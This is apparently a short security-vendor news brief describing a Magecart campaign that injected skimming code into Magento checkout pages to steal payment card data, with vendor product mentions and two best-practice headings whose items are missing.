Researchers found compromised checkout pages on shopping websites that were skimming customers’ debit and credit card information on Magento-based payment forms. Analysis showed that while this Magecart group infected all the PHP pages of the compromised websites, the phishing form only appears on the checkout page with their own card information fields and triggers data exfiltration. After a successful referrer check, obfuscated scripts can validate and exfiltrate the data to the cybercriminals’ malicious domain via POST request. Users are advised to look for suspicious and redundant information requests as this group may be using the collected information for more malicious activities.
Jerome Segura of Malwarebytes found the suspicious activity in a web crawl of a Magento-based website, and noted the phishing form still having the PayU shopper page redirect instructions despite the presence of the credit card information fields on the same page. Further analysis showed that while all the PHP pages of the website were injected with malicious code, it is only triggered if the user is in the shopping cart checkout page with the URL onestepcheckout in the address bar. The cybercriminals load their own iframe to collect credit card data, validating the information before exfiltration.
Online business owners can protect themselves from this threat with these best practices:
Online shoppers are advised to be vigilant and follow these best practices:
The following Trend Micro solutions, powered by XGen™ security, protect users and businesses by blocking the scripts and preventing access to the malicious domains: Trend Micro™ Security; Smart Protection Suites and Worry-Free™ Business Security; Trend Micro Network Defense, and Hybrid Cloud Security.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.